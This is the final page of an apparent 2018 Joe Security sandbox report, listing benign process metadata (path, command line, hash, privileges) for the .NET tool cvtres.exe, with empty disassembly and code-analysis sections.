Analysis Process: cvtres.exe PID: 2060 Parent PID: 2644
General
Start time: 20:28:41 Start date: 20/06/2018 Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe Wow64 process (32bit): false Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACH INE:IX86 '/OUT:C:\Users\HERBBL~1\AppData\Local\Temp\RESD500.tmp' 'c:\Users\user\ AppData\Local\Temp\CSCD405.tmp' Imagebase: 0x400000 File size: 32912 bytes MD5 hash: 200FC355F85ECD4DB77FB3CAB2D01364 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate
Disassembly
Code Analysis
Copyright Joe Security LLC 2018 Page 28 of 28